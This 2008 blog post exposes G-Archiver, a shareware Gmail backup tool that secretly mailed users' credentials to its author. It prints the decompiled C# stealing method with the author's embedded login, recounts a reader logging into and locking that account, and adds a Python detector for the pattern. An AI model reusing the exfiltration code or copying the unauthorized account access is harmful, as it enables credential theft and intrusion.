Sunday, March 09, 2008

Password Stealing Shareware a Wake-Up Call?

I haven't hidden the fact that I've been a victim of ID theft before. I've also had the good fortune to be one of the employees whose past IBM employee data was lost. This story, however, is a wake-up call: you shouldn't casually trust any shareware or freeware program - or even service.

Coding Horror wrote on Friday about an email it received from a reader named Dustin Brooks, which is truly a tale of horror:

I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.

It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information, I became concerned.

I opened up a browser and logged in to gmail using his account information. It still worked.

Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted Google to erase this account as I didn't see a way to delete it myself.

The evidence is in the SM.dll Mail class:
using System;
using System.Net;
using System.Net.Mail;
using System.Text;

// Decompiled from the Mail class in SM.dll. The two parameters are the user's
// own Gmail username and password, entered when an account is added for backup.
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        // Fixed recipient: the author's mailbox, not anything the user chose.
        message.To.Add("JTerry79@gmail.com");
        message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
        message.Subject = "Account";
        message.SubjectEncoding = Encoding.UTF8;
        // The body is the user's credentials in clear text.
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        message.BodyEncoding = Encoding.UTF8;
        message.IsBodyHtml = false;
        message.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        // The author's own Gmail login is embedded in the assembly.
        client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
        client.Port = 0x24b; // 587, the SMTP submission port
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
        // Any failure is swallowed, so the user never sees an error.
    }
}

I see no reason for the programmer to have the email addresses and passwords of the users of this program sent to him. That's bad enough, but the program is also shareware, priced at $29.95, so he has the audacity to charge you for your info.

I have to applaud Brooks, but I think he should have gone further. I would have reported this to the authorities. Maybe he could have used G-Archiver to archive the guy's email as evidence!
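As an added example (not code from this post, from Coding Horror, or from G-Archiver), here is a small Python audit that scans decompiled C# for the three ingredients Brooks found in SM.dll: a fixed recipient, an SMTP login embedded as string literals, and method parameters concatenated into the mail body. The two C# samples and the example.invalid addresses are constructed placeholders, not values from the real assembly.

```python
import re

# Constructed sample: the shape of the decompiled method quoted above, with
# placeholder recipient and credentials instead of the values from the assembly.
SUSPECT_SOURCE = r'''
public static void CheckConnection(string a, string b)
{
    MailMessage message = new MailMessage();
    message.To.Add("collector@example.invalid");
    message.Body = "Username: " + a;
    message.Body = message.Body + "\r\nPassword: " + b;
    SmtpClient client = new SmtpClient();
    client.Credentials = new NetworkCredential("collector@example.invalid", "placeholder-secret");
    client.Send(message);
}
'''
# Constructed benign sample: recipient and login both come from the caller.
BENIGN_SOURCE = r'''
public static void SendReport(string to, string user, string pass, string report)
{
    MailMessage message = new MailMessage();
    message.To.Add(to);
    message.Body = report;
    SmtpClient client = new SmtpClient();
    client.Credentials = new NetworkCredential(user, pass);
    client.Send(message);
}
'''
SIGNATURE = re.compile(r'\(([^()]*)\)\s*\{')                    # first parameter list
FIXED_RECIPIENT = re.compile(r'\.To\.Add\(\s*"([^"]+)"\s*\)')    # literal To: address
EMBEDDED_LOGIN = re.compile(r'new\s+NetworkCredential\(\s*"([^"]*)"\s*,\s*"[^"]*"\s*\)')
BODY_CONCAT = re.compile(r'\.Body\s*=[^;]*?\+\s*([A-Za-z_]\w*)\s*;')  # identifier appended to Body

def audit(source: str) -> dict:
    """Flag the G-Archiver pattern in one decompiled method. Only the username of an
    embedded login is reported; the secret itself is never echoed back."""
    sig = SIGNATURE.search(source)
    params = {p.split()[-1] for p in sig.group(1).split(",") if p.strip()} if sig else set()
    recipients = FIXED_RECIPIENT.findall(source)
    embedded_logins = EMBEDDED_LOGIN.findall(source)
    leaked_params = [p for p in BODY_CONCAT.findall(source) if p in params]
    return {"recipients": recipients, "embedded_logins": embedded_logins,
            "leaked_params": leaked_params,
            "suspected": bool(recipients and embedded_logins and leaked_params)}

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_SOURCE), ("benign", BENIGN_SOURCE)):
        print(name, audit(src))
```

The benign sample shows why all three signals are required together: a mail client that takes recipient and login from the user trips none of them.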

It's also interesting that at least a few large download sites have been fooled into hosting this application. I emailed these two about the potential issue.

In my search, I also found a site ironically purporting to have a crack for the program.

As I said, this incident should make you wary of handing your user info and passwords to just any service. This is the first time I've heard of something like this, and it's going to affect the trust that users have for startups, freeware and shareware in the future - and that's a bad thing for all of us.
